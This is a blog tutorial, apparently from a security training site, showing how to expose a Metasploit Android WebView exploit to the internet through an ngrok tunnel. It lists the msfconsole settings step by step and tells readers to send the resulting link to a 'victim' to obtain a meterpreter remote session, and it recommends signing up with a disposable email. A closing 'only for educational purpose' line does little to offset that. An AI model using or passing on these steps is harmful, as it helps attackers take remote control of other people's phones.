CIP Cyber

Use Metasploit on WAN without Port Forwarding

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all of my previous Metasploit articles or videos, I am always performing
attacks on LAN. Lots of people were asking me how to use Metasploit on the
Internet or WAN. One way is to port forward the router. But in today’s post, I
am going to use a different method which doesn’t require any port forwarding.

Setting Ngrok

First of all, we start with creating account at
Use any disposable email service to sign up.
After signing up, log in to and download the ngrok
Now extract the file and open terminal in that folder.
Log in again to your ngrok account and type the commands
available on that page.

Copy the authentication code command and paste in the terminal.

./ngrok authtoken

With the above command, the authentication code will be saved in
your computer.
Now type the following command to start the tunnel.

./ngrok http

Now the ngrok will start a tunnel to your computer. Copy the
Ngrok URL we will need this URL later in this tutorial. Also remember the port
in above command.

Using Metasploit with

For this tutorial, we are using Android web view exploit.
Open terminal and type msfconsole.
Now type the following command to load Android web view exploit.


Now while setting SRVHOST and LHOST use localhost.

set srvhost localhost
set lhost localhost

In SRVPORT we will use same port that we have used while
starting ngrok .i.e 4431.

set srvport 4431

Now set URIPATH to /. Use the following commands.

set uripath /

Above three steps are most important, so don’t change the
Then enter run to start exploit.
Now you can send the link that you have got when you started
Ngrok to the victim and you we be able to get the
meterpreter session over the internet

Video Demonstration

Use Social Engineering
Toolkit without Port Forwarding


Don’t change the values of srvhost, lhost and uripath.
Make sure srvport and port you set while starting ngrok are
Only for educational purpose. 


article has been written by Aditya Joshi who writes for
and can be reached on @darktruth190
Irfan Shakeel

Irfan Shakeel

Irfan Shakeel is a distinguished cybersecurity professional, thought leader, and trainer. As a director at CIP Cyber, he contributes valuable insights and opinions on the industrial cybersecurity domain. In addition to his written expertise, Irfan hosts the popular CIP Cybersecurity webinar, further showcasing his extensive knowledge and commitment to enhancing critical infrastructure protection.

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